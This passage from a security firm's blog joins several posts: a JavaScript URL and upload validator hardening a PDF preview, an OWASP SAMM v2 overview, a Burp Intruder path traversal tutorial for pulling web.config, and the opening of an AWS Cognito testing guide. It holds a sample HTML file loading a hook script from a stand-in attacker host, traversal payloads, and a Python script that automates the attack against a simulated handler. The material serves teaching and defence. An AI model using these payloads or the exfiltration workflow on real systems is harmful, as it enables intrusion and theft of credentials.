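// Added example, not code from the original post or from any chat product.
// Names (previewTypeNaive, previewTypeStrict, validateUpload, PREVIEW_ALLOWLIST,
// MAGIC) and the evil.example / docs.example hosts are illustrative assumptions.

// Extensions the preview component is allowed to render (the allowlist from the post).
const PREVIEW_ALLOWLIST = new Set(['pdf', 'jpg', 'jpeg', 'png']);

// The weak check from the "Malicious URLs" section: a ".pdf" substring anywhere in
// the URL selects the PDF preview module, so a folder called ".pdf" on an attacker's
// server (or an HTML page inside it) triggers the preview as well.
function previewTypeNaive(rawUrl) {
  return rawUrl.toLowerCase().includes('.pdf') ? 'pdf' : null;
}

// Hardened check: parse the URL, look only at the extension of the final path
// segment (URL.pathname already excludes query string and fragment), require a
// non-empty base name, an allowlisted extension and https.
function previewTypeStrict(rawUrl) {
  let u;
  try { u = new URL(rawUrl); } catch (e) { return null; }
  if (u.protocol !== 'https:') return null;
  const last = u.pathname.split('/').pop();          // '' for a trailing slash
  const m = /^(.*[^.])\.([a-z0-9]+)$/i.exec(last);    // "name.ext"; rejects ".pdf" alone
  if (m === null) return null;
  const ext = m[2].toLowerCase();
  return PREVIEW_ALLOWLIST.has(ext) ? ext : null;
}

// Signature bytes for each allowlisted type, used for the "actual content" check.
const MAGIC = {
  pdf: { mime: 'application/pdf', bytes: [0x25, 0x50, 0x44, 0x46, 0x2d] },                  // "%PDF-"
  png: { mime: 'image/png',       bytes: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] },
  jpg: { mime: 'image/jpeg',      bytes: [0xff, 0xd8, 0xff] },
};
MAGIC.jpeg = MAGIC.jpg;

function hasPrefix(buf, bytes) {
  if (buf.length < bytes.length) return false;
  for (let i = 0; i < bytes.length; i++) {
    if (buf[i] !== bytes[i]) return false;
  }
  return true;
}

// Upload gate: extension, declared Content-Type and the real leading bytes must all
// agree on one allowlisted type. Returns that type, or null to reject the upload.
function validateUpload(filename, declaredType, buf) {
  const m = /\.([a-z0-9]+)$/i.exec(filename);
  if (m === null) return null;
  const ext = m[1].toLowerCase();
  const spec = MAGIC[ext];
  if (spec === undefined) return null;                                   // e.g. "invoice.pdf.exe"
  const mime = String(declaredType).split(';')[0].trim().toLowerCase();  // drop "; charset=..."
  if (mime !== spec.mime) return null;                                   // declared type disagrees
  if (!hasPrefix(buf, spec.bytes)) return null;                          // HTML/EXE renamed to .pdf
  return ext === 'jpeg' ? 'jpg' : ext;
}

// Constructed sample inputs (not real captures) covering the cases in the post.
const SAMPLE_PDF = Buffer.from('%PDF-1.7\n1 0 obj << /Type /Catalog >> endobj\n');
// "\x3c" is "<": an HTML page loading a BeEF-style hook script, renamed to .pdf.
const SAMPLE_HTML = Buffer.from('\x3chtml\x3e\x3cscript src="https://evil.example/hook.js"\x3e\x3c/script\x3e');

function demo() {
  return {
    naiveTrap:    previewTypeNaive('https://evil.example/.pdf/minded.html'),      // 'pdf' (fooled)
    strictTrap:   previewTypeStrict('https://evil.example/.pdf/minded.html'),     // null
    strictDir:    previewTypeStrict('https://evil.example/.pdf'),                 // null
    strictOk:     previewTypeStrict('https://docs.example/report.pdf?v=2'),       // 'pdf'
    uploadOk:     validateUpload('report.pdf', 'application/pdf', SAMPLE_PDF),    // 'pdf'
    uploadRename: validateUpload('minded.pdf', 'application/pdf', SAMPLE_HTML),   // null
    uploadLie:    validateUpload('minded.pdf', 'text/html', SAMPLE_PDF),          // null
    uploadDouble: validateUpload('minded.pdf.exe', 'application/pdf', SAMPLE_PDF) // null
  };
}

console.log(demo());
```

<div style="text-align: justify;">
The strict URL check deliberately ignores the query string and fragment and refuses a bare ".pdf" segment, which is exactly the trick used above; the upload gate rejects an HTML file renamed to .pdf because its first bytes are not "%PDF-", whatever the client declared.</div>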
<div style="text-align: justify;">
<h3 style="text-align: justify;">
References</h3>
<div>
<div style="text-align: justify;">
https://acrobatusers.com/assets/collections/tutorials/legacy/tech_corners/javascript_corner/tips/2006/popup_windows_part2/AlertBoxExamples.pdf</div>
<div style="text-align: justify;">
https://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/enhanced.html</div>
<div style="text-align: justify;">
https://owasp.org/www-community/attacks/CSV_Injection</div>
<div style="text-align: justify;">
https://beefproject.com/</div>
</div>
</div>
<div style="text-align: justify;">Author: Fabrizio Bugli</div>
<h2>OWASP SAMM v2: lessons learned after 9 years of assessment</h2>
<div>Published 2020-04-30</div>
<h3>
OWASP SAMM v2 is out!</h3>
<br />OWASP SAMM (Software Assurance Maturity Model) is the OWASP framework that helps organizations assess, formulate and implement, through a self-assessment model, a strategy for software security that can be integrated into their existing Software Development Lifecycle (SDLC).<br />
<br />
<h4>
The new OpenSAMM</h4>
<br />The original model, OpenSAMM 1.0, was written by Pravir Chandra and dates back to 2009. Over the last 10 years it has proven to be a widely adopted and effective model for improving secure software practices in different types of organizations. With SAMM v2, further improvements have been made to deal with some of its perceived limitations.<br /><br />For those organizations using earlier versions of SAMM, it is important to take the time to understand how the framework has evolved in favor of automation and better alignment with development teams.<br /><br />The new model supports maturity measurements from both a coverage and a quality perspective, and adds new quality criteria for all the activities. There is also an updated SAMM scoring toolbox designed to help assessors and organizations with their software assurance assessments and roadmaps.<br /><br />
<h4>
What about your development models?</h4>
<br />The new SAMM model is development paradigm agnostic. It supports waterfall, iterative, agile, and DevOps development. The model is flexible enough to allow organizations to take a path based on their risk tolerance and the way they build and use software. The model is built upon the core business functions of software development, with security assurance practices.<br />
<br />
<h4>
What’s changed with SAMM v2?</h4>
<br />Version 2.0 of the model now supports frequent updates through small incremental changes to specific parts of the model, with regular updates to explanations, tooling and guidance by the community.<br /><br />The 3 maturity levels remain as they were. Level 1 is initial implementation; level 2, structured realization; and level 3, optimized operation.<br /><br />This is the updated SAMM version 2 model:<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivxT14B9PzZFMwh_BR694a6iRKBZ3dPlas0DYRrWXVxPuYAQPcr3GBI3bs9kVhWq1K2J-HKjWkyrrOFRygHnKhcNqip_GbDyMw17Dq-fT3YqWQBccue09-LNXiye7jTG4MYY3l-5OFFCU/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="856" data-original-width="1520" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivxT14B9PzZFMwh_BR694a6iRKBZ3dPlas0DYRrWXVxPuYAQPcr3GBI3bs9kVhWq1K2J-HKjWkyrrOFRygHnKhcNqip_GbDyMw17Dq-fT3YqWQBccue09-LNXiye7jTG4MYY3l-5OFFCU/s640/image1.png" width="640" /></a></div>
<br />The major changes are the following:<br />
<ul>
<li>From 4 to 5 business functions and from 12 to 15 security practices. The 4 business functions of version 1.5 become 5 core business functions:
<ul>
<li>Governance</li>
<li>Design (formerly Construction)</li>
<li>Implementation</li>
<li>A redesigned Verification function</li>
<li>Operations</li>
</ul>
</li>
<li>Implementation represents a number of core activities in the build and deploy domains of an organization. It also includes a new security practice that deals with Defect Management (the fixing process).</li>
<li>New security practices: Secure Build, Secure Deployment, Defect Management, Architecture Analysis, Requirements-driven Testing.</li>
<li>A new concept, Streams, appears with version 2: activities are now presented as logical flows throughout each of the 15 security practices, divided into two streams, which align and link the activities in the practice over the different maturity levels. Each stream has an objective that can be reached at increasing levels of maturity.</li>
<li>The model now supports maturity measurements from both a coverage and a quality perspective. There are new quality criteria for all SAMM activities and an updated scoring model to help SAMM assessors and organizations with their software assurance.</li>
</ul>
<br />
<h4>
What we learned in the last 9 years of assessments</h4>
Minded Security has performed many software security assessments based on SAMM v1
and v1.5. The following diagram shows the aggregated results of those assessments:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZfzJ6N2sYVfKO1FQi04BoNBVUREGmqGjVOEGJDiA9iBorWJUiV68xTUXXr64foqIaziKiBqXqJGdpfVGSf7gkya2M86hcY7oIyEotyzXzzu-b3t_JmFkeDxqpTWBhunaagEYGGk7-_Kk/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="748" data-original-width="1151" height="414" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZfzJ6N2sYVfKO1FQi04BoNBVUREGmqGjVOEGJDiA9iBorWJUiV68xTUXXr64foqIaziKiBqXqJGdpfVGSf7gkya2M86hcY7oIyEotyzXzzu-b3t_JmFkeDxqpTWBhunaagEYGGk7-_Kk/s640/image2.png" width="640" /></a></div>
<br /><br />We grouped the results of the SAMM assessments performed up to 2012 (blue line), from 2013 to 2015 (orange line) and from 2016 to 2018 (gray line).<br /><br />As the 2012 results show, a company's first answer to software security issues is: testing, testing, testing!<br /><br />What we learned over these years is that testing is NOT the solution to software security. Testing is just one part of the software security journey.<br /><br />The security efforts of software developers are currently being stymied by time constraints, complexity and deployment frequency.<br /><br />The timeline for reporting and fixing critical vulnerabilities (up to one month to share, up to six months to fix) remains unacceptably long.<br /><br />Today we need instant security feedback: the keys to achieving a fix within hours of discovery are new standards, more automation, and promptly sharing vulnerability information internally.<br /><br />That is why you need to improve all the security practices of the SAMM model in order to manage software security properly. A SAMM assessment gives you a complete view of the problem: today the SAMM framework has become crucial for building an efficient, solid software security roadmap in companies.<br /><br />
<div>Author: Matteo Meucci</div>
<h2>How to Path Traversal with Burp Community Suite</h2>
<div>Published 2020-03-17</div>
<h3>
Introduction</h3>
<br />
<div>
A well-known, never out of fashion and high-impact vulnerability is <a href="https://owasp.org/www-community/attacks/Path_Traversal" target="_blank">Path Traversal</a>. This technique is also known as the dot-dot-slash attack (../) or directory traversal, and it consists in exploiting insufficient validation/sanitization of user input that the application uses to build pathnames for retrieving files or directories from the file system, which are expected to be located underneath a restricted parent directory.<br />
By manipulating the values through special characters, an attacker can cause the pathname to resolve to a location outside of the restricted directory.<br />
<br />
In OWASP terms, a path traversal attack falls under category A5 of the OWASP Top 10 (2017), Broken Access Control, so as one of the top ten issues of 2017 it deserves special attention.<br />
<br />
In this blog post we will explore an example of web.config exfiltration via path traversal using <b>Burp Suite Intruder Tool</b>.<br />
<br />
Previous posts about path traversal:<br />
<a href="https://blog.mindedsecurity.com/2018/10/how-to-prevent-path-traversal-in-net.html" target="_blank">How to prevent Path Traversal in .NET</a><br />
<a href="https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html" target="_blank">From Path Traversal to Source Code in Asp.NET MVC Applications</a></div>
<div>
<h3>
Testing Step-by-Step</h3>
</div>
<div>
First, get a copy of <a href="https://portswigger.net/burp/communitydownload">Burp Suite Community Edition</a>, a useful testing tool that provides many automated and semi-automated features to make security testing more efficient.<br />
In particular, the <i><a href="https://portswigger.net/burp/documentation/desktop/tools/intruder/using" target="_blank">Burp Intruder</a></i> feature can be very useful to exploit path traversal vulnerabilities.</div>
<div>
<br />
Suppose there is a <i>.NET web application</i> vulnerable to path traversal. To exploit the issue, the attacker can try to download the whole source code of the application by following <a href="https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html" target="_blank">this tutorial</a>.<br />
<br /></div>
<div>
Once the attacker finds a server endpoint that might be vulnerable to Path Traversal, it's possible to send it to <i>Burp Intruder</i> as shown in the following screenshot.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmsASlKPCYiIYcdX0-Gah5sNDQj1Fqhcb95wNqB30uN3hU0HbBnO-U_pH3M2o18O2Jbiajc2_gI1vuU2FUEo8pkt2opt8WImMBaicvkDWdF7Pa1sND98bYzZQ0FIdvUUnuUXBoPqkS85I/s1600/SendToIntruder.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1365" data-original-width="1600" height="545" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmsASlKPCYiIYcdX0-Gah5sNDQj1Fqhcb95wNqB30uN3hU0HbBnO-U_pH3M2o18O2Jbiajc2_gI1vuU2FUEo8pkt2opt8WImMBaicvkDWdF7Pa1sND98bYzZQ0FIdvUUnuUXBoPqkS85I/s640/SendToIntruder.PNG" width="640" /></a></div>
<div>
<br /></div>
<div>
<br />
On the Intruder tab, the target is set to the request that will be manipulated in order to retrieve the <i>web.config</i> file.</div>
<div>
<br /></div>
<div>
Make sure that the payload marker is placed on the right parameter; if it is not, click "Clear §", select the parameter value to fuzz and click the "Add §" button.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitDzejk8AqLSIl5JN5uRfnmUXUdDfcRX7mbsTevs6kv9eT0sn9Rda79Q79wUV7eSTb4cG6vNhCRAH4RA9trMSiZf4s5I-NaPdbD96xAuufrDoDRRCgOnzJZRX8UZpaw-1cWKDJ0ePOHeY/s1600/IntruderPreview.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1338" data-original-width="1600" height="532" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitDzejk8AqLSIl5JN5uRfnmUXUdDfcRX7mbsTevs6kv9eT0sn9Rda79Q79wUV7eSTb4cG6vNhCRAH4RA9trMSiZf4s5I-NaPdbD96xAuufrDoDRRCgOnzJZRX8UZpaw-1cWKDJ0ePOHeY/s640/IntruderPreview.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
To set the payloads that Burp Intruder will use in the requests, download the file <a href="https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/path-traversal/traversals-8-deep-exotic-encoding.txt">traversals-8-deep-exotic-encoding.txt</a> from the <a href="https://github.com/fuzzdb-project/fuzzdb">fuzzdb project</a> and load it into <i>Burp Intruder</i> as follows:<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li>go to the "Payloads" sub-tab;</li>
<li>select from dropdown list "Payload type" the value "Simple List";</li>
<li>in the panel "Payload Options" click on "Load..." button and select the fuzzing path traversal file (as shown in following screenshot).</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCX9Wh76nIEIybxAzj3IirS-CVi5N_2XYPwRHuZXHHU2f7QiUmJVEQvzsRdPj3-fkVaKUJ0bZ6jsw1pODi3lon0k_xW6MadF0LvDgzxjl2mAPwX9CtzeRkfAe2m57M-9HFHxLvP4APzK8/s1600/PayloadConfiguration.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1338" data-original-width="1600" height="532" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCX9Wh76nIEIybxAzj3IirS-CVi5N_2XYPwRHuZXHHU2f7QiUmJVEQvzsRdPj3-fkVaKUJ0bZ6jsw1pODi3lon0k_xW6MadF0LvDgzxjl2mAPwX9CtzeRkfAe2m57M-9HFHxLvP4APzK8/s640/PayloadConfiguration.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The next step is to add a Payload Processing rule that matches the placeholder "{FILE}" and replaces it with the name of the file we want to exfiltrate (in our example "web.config"), so click the "Add" button.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCzydd0_TkFx1GAM7_yboWzDMrIV2Jr5GUKQ3bUKgUlPE9Fkpg08S3n72giVzgdrk7dKNGYjK7avTCyoTIqqmrLBM7ADjbudTa9yKvHuXBpjdxTrggE1QCO-LBgpezAcVcrYEDPH-BLO0/s1600/screenshot+Burp+1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="1515" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCzydd0_TkFx1GAM7_yboWzDMrIV2Jr5GUKQ3bUKgUlPE9Fkpg08S3n72giVzgdrk7dKNGYjK7avTCyoTIqqmrLBM7ADjbudTa9yKvHuXBpjdxTrggE1QCO-LBgpezAcVcrYEDPH-BLO0/s640/screenshot+Burp+1.PNG" width="606" /></a></div>
<br />
<br />
In the payload processing rule dialog, set the Match string to "{FILE}" and the Replace string to "web.config", as shown in the following screenshot:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJsQsM1Vc0Tljg52alKKtiaQyyz6E7R1DIqLLiYzqon3XZ48c_xT-qq28yZEUmpi7R9hq3aYJ8vN-EzC2CCRV7Y92MqEo0Uyartgn3FsyAicKP25j3x1z7m6MhctZQutbrlMFG1NyFMWA/s1600/screenshot+Burp+2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="1562" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJsQsM1Vc0Tljg52alKKtiaQyyz6E7R1DIqLLiYzqon3XZ48c_xT-qq28yZEUmpi7R9hq3aYJ8vN-EzC2CCRV7Y92MqEo0Uyartgn3FsyAicKP25j3x1z7m6MhctZQutbrlMFG1NyFMWA/s640/screenshot+Burp+2.PNG" width="624" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
To recognise a successful response at a glance, add a Grep-Match expression for a string that is known to appear in the target file.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Remove any existing Grep-Match rules:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfJ2scT_vfa24m-Rb0kWO_yklJOrZ0pQLT5sqO7dnjIQpiGvlwZNhZ2fvwe3G8NDOz3sIHgFtF-ekI_fiGfNVbkc_y_mtdl9thIHtpyy67rjU80c8ZkJj3GWsPi5jQcmmFWWcVH5m0XJU/s1600/GrepMatchOptions1.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><br /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfJ2scT_vfa24m-Rb0kWO_yklJOrZ0pQLT5sqO7dnjIQpiGvlwZNhZ2fvwe3G8NDOz3sIHgFtF-ekI_fiGfNVbkc_y_mtdl9thIHtpyy67rjU80c8ZkJj3GWsPi5jQcmmFWWcVH5m0XJU/s1600/GrepMatchOptions1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1406" data-original-width="1600" height="562" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfJ2scT_vfa24m-Rb0kWO_yklJOrZ0pQLT5sqO7dnjIQpiGvlwZNhZ2fvwe3G8NDOz3sIHgFtF-ekI_fiGfNVbkc_y_mtdl9thIHtpyy67rjU80c8ZkJj3GWsPi5jQcmmFWWcVH5m0XJU/s640/GrepMatchOptions1.PNG" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Then add a new Grep-Match rule for the string "&lt;configuration&gt;", which indicates that the web.config file has been returned.</div>
<div>
<br /></div>
<div style="margin-left: 1em; margin-right: 1em;">
<div style="text-align: center;">
<img border="0" data-original-height="1406" data-original-width="1600" height="562" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu-vNtVBHcQ0dKQV9hJusqjjNXTD3V7hm2MSjZ2J5fQlm04Q4K5fWay-y1nqIWXf49KMr2OFLFWeG60DJwnrSxZ_I5As4gV0kEGufwUxQ1-vPiCtceSr67nY6PjIX0TvItRIeshrC10TI/s640/GrepMatchOptions2.PNG" width="640" /></div>
</div>
<br />
<div>
<br />
Finally, tune the Request Engine options (number of threads, retries, pause before retry, throttling) according to the target's limitations (rate limiting, firewalls, etc.) in order to avoid false negatives, for example by increasing the pause before retry.<br />
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQe-wjFTFj_SQvnpahyphenhyphen-LBdzWgjqCZE-3UeWrdwyv1ePHA9Wfq8-OCbGiyYBP0LTqDQb9w6CVRgQgcEw2rj7e8GBxwaWYyx916wPM78Wex6IEwuISXiGLmA9expFYGgVL_UOJbAKwUXBk/s1600/StartAttack.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1406" data-original-width="1600" height="562" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQe-wjFTFj_SQvnpahyphenhyphen-LBdzWgjqCZE-3UeWrdwyv1ePHA9Wfq8-OCbGiyYBP0LTqDQb9w6CVRgQgcEw2rj7e8GBxwaWYyx916wPM78Wex6IEwuISXiGLmA9expFYGgVL_UOJbAKwUXBk/s640/StartAttack.PNG" width="640" /></a></div>
<br />
<br /></div>
<div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
<b>Let's launch the attack. </b></div>
<div class="separator" style="clear: both;">
<br /></div>
If the endpoint is vulnerable to path traversal, the "configuration" grep column will be checked for the payloads that succeeded, and the corresponding response contains the extracted web.config file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDXUlRQpmsaljyh_z7j-QdoeBF_4hZxwt7XTuYnb6utZIxPbIei7U01xHl4usJnOFWDvUYakToXG6qtXsTtm2JjtBTGUtxVSvu09bx108vWhyImmprq1INYHSieBsj7xZJ3v4mzmqLmW0/s1600/AttackResultOrdered.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1245" data-original-width="1600" height="498" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDXUlRQpmsaljyh_z7j-QdoeBF_4hZxwt7XTuYnb6utZIxPbIei7U01xHl4usJnOFWDvUYakToXG6qtXsTtm2JjtBTGUtxVSvu09bx108vWhyImmprq1INYHSieBsj7xZJ3v4mzmqLmW0/s640/AttackResultOrdered.PNG" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWao7_MpXEfrKlofdlG8Mphrh1IAaI8NuVrsqErRtt8xeMwKbQxwiWWktcxuRp-Nk6UPV4vAzGgitz1FcIrhmZLbwhe4RBG7E9mYG40p90Xl7WTebnPZExszwa_xD7PxP28RsOUxfAYw4/s1600/WebConfigExtracted.PNG" imageanchor="1" style="display: inline; margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1245" data-original-width="1600" height="498" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWao7_MpXEfrKlofdlG8Mphrh1IAaI8NuVrsqErRtt8xeMwKbQxwiWWktcxuRp-Nk6UPV4vAzGgitz1FcIrhmZLbwhe4RBG7E9mYG40p90Xl7WTebnPZExszwa_xD7PxP28RsOUxfAYw4/s640/WebConfigExtracted.PNG" width="640" /></a></div>
<div>
</div>
</div>
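<div style="text-align: justify;">
The Intruder workflow above (payload list with a "{FILE}" placeholder, Match/Replace to "web.config", Grep-Match on "&lt;configuration&gt;") reduced to a script, as an added example that is not part of the original post and not Burp's own code. The target is a constructed in-memory simulation of a .NET download handler (<i>vulnerable_handler</i> / <i>hardened_handler</i>, with an invented <i>/inetpub/wwwroot/app</i> layout and a constructed web.config), and the seven traversal templates are written in the style of the fuzzdb list rather than copied from it, so everything runs offline:</div>

```python
"""Added example (not part of the original post): the Burp Intruder path traversal
attack as a script, run against a constructed in-memory target."""
import posixpath
from urllib.parse import unquote

# Constructed templates in the style of fuzzdb's traversals-8-deep-exotic-encoding.txt
# ({FILE} is the placeholder that Burp's Match/Replace rule swaps for the target file).
TRAVERSAL_TEMPLATES = [
    "../{FILE}",
    "../../{FILE}",
    "../../../{FILE}",
    "..%2f{FILE}",              # URL-encoded slash
    "..%2f..%2f{FILE}",
    "..%252f{FILE}",            # double-encoded slash
    "..\\{FILE}",               # Windows separator
]

# Grep-Match expression: a string that only appears in the file we are after.
GREP_MARKER = "<configuration>"

# Constructed target layout (assumed, not a real server): the download handler
# serves files below DOWNLOAD_DIR, and web.config lives one level up in APP_ROOT.
APP_ROOT = "/inetpub/wwwroot/app"
DOWNLOAD_DIR = APP_ROOT + "/downloads"
VFS = {
    DOWNLOAD_DIR + "/brochure.pdf": "%PDF-1.4 (constructed sample)",
    APP_ROOT + "/web.config": (
        '<?xml version="1.0"?>\n<configuration>\n'
        '  <connectionStrings><add name="db" connectionString="Server=db;User=sa;Password=constructed"/></connectionStrings>\n'
        '</configuration>'
    ),
}


def build_payloads(templates, filename):
    """Payload processing rule from the post: replace {FILE} with the target file name."""
    return [t.replace("{FILE}", filename) for t in templates]


def _resolve(user_path):
    """What a naive handler does: decode once, unify separators, join and normalise."""
    decoded = unquote(user_path).replace("\\", "/")
    return posixpath.normpath(posixpath.join(DOWNLOAD_DIR, decoded))


def vulnerable_handler(user_path):
    """Simulated vulnerable endpoint: no check that the resolved path stays in DOWNLOAD_DIR."""
    return VFS.get(_resolve(user_path), "404 Not Found")


def hardened_handler(user_path):
    """Same endpoint with the fix: refuse anything that resolves outside DOWNLOAD_DIR."""
    full = _resolve(user_path)
    if not full.startswith(DOWNLOAD_DIR + "/"):
        return "403 Forbidden"
    return VFS.get(full, "404 Not Found")


def run_intruder(handler, templates, filename, marker):
    """Send every payload (here: call the handler) and keep those whose response
    contains the grep marker, i.e. the rows Burp flags in the 'configuration' column."""
    return [p for p in build_payloads(templates, filename) if marker in handler(p)]


if __name__ == "__main__":
    print("vulnerable handler, payloads that leaked web.config:",
          run_intruder(vulnerable_handler, TRAVERSAL_TEMPLATES, "web.config", GREP_MARKER))
    print("hardened handler, payloads that leaked web.config:",
          run_intruder(hardened_handler, TRAVERSAL_TEMPLATES, "web.config", GREP_MARKER))
```

<div style="text-align: justify;">
Against the simulated handler only the one-level payloads hit (plain, single-encoded and backslash variants), because that is where web.config sits relative to the download directory; deeper and double-encoded variants miss, which is the same information the Intruder result table gives you. The hardened handler returns no hits because it compares the normalised path against the allowed directory before reading.</div>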
<div>
<br /></div>
<div>Author: Enrico Aleandri</div>
<h2>A practical guide to testing the security of Amazon Web Services (Part 3: AWS Cognito and AWS CloudFront)</h2>
<div>Published 2020-02-14</div>
<br />This is the last part of our three-post series discussing the main Amazon Web Services and their security.<br />
<br />
In the previous two parts we discussed two of the most used Amazon services, namely AWS S3 and AWS EC2. If you still haven't checked them, you can find them here: <a href="https://blog.mindedsecurity.com/2018/09/a-practical-guide-to-testing-security.html" target="_blank">Part 1</a> and <a href="https://blog.mindedsecurity.com/2018/09/a-practical-guide-to-testing-security_18.html" target="_blank">Part 2</a>.<br />
<br />
In this final post we discuss two additional services that you might encounter when analyzing the security of a web application: <i><a href="https://aws.amazon.com/it/cognito/" target="_blank">AWS Cognito</a></i> and <i><a href="https://aws.amazon.com/it/cloudfront/" target="_blank">AWS CloudFront</a></i>.<br />
These are two very different services related to supporting web applications in two specific areas:<br />
<br />
<ul>
<li><i>AWS Cognito</i> aims at providing an access control system that developers can implement in their web applications. </li>
<li><i>AWS CloudFront</i> is a Content Delivery Network (CDN) that delivers your data to the users with low latency and high transfer speed.</li>
</ul>
<br />
<br />
<h3>
AWS Cognito</h3>
<div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpqySyjh0heiZdC-zhFWBfDBTc6WKv-m60tShU5mi-gOU2JpbtSwKVRbphPGM1B4uQQ9mdfjKGxlsHCNPsAZHTlvw20cgkEK7otDlJMEl_qUlLipboWd48lp4s8QFEhxjoI90Nhv2fsvKj/s1600/MobileServices_AmazonCognito.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: center;"><img border="0" data-original-height="400" data-original-width="400" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpqySyjh0heiZdC-zhFWBfDBTc6WKv-m60tShU5mi-gOU2JpbtSwKVRbphPGM1B4uQQ9mdfjKGxlsHCNPsAZHTlvw20cgkEK7otDlJMEl_qUlLipboWd48lp4s8QFEhxjoI90Nhv2fsvKj/s200/MobileServices_AmazonCognito.png" width="200" /></a><br /><br />It provides developers with an authentication, authorization and user management system that can be implemented in web applications and<span style="text-align: center;"> is divided into two components:</span><br />
<br />
<ul>
<li><span style="text-align: center;">user pools;</span></li>
<li><span style="text-align: center;">identity pools. </span></li>
</ul>
Quoting <a href="https://docs.amazonaws.cn/en_us/cognito/latest/developerguide/cognito-scenarios.html" target="_blank">AWS documentation</a> on Cognito:<br />
<blockquote class="tr_bq">
User pools are user directories that provide sign-up and sign-in options for your app users. Identity pools enable you to grant your users access to other AWS services. You can use identity pools and user pools separately or together.</blockquote>
From a security perspective, we are particularly interested in <i>identity pools</i> as they provide access to other AWS services we might be able to mess with.<br />
<br />
Identity pools are identified by an ID that looks like this:<br />
<blockquote class="tr_bq">
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new", courier, monospace;">us-east-1:1a1a1a1a-ffff-1111-9999-12345678</span></blockquote>
<br />
A web application will then query AWS Cognito by specifying the proper <i>Identity pool ID</i> in order to get temporary, limited-privilege AWS credentials to access other AWS services.<br />
<br />
An identity pool also allows specifying a role for users who are not authenticated.<br />
Amazon documentation states:<br />
<blockquote class="tr_bq">
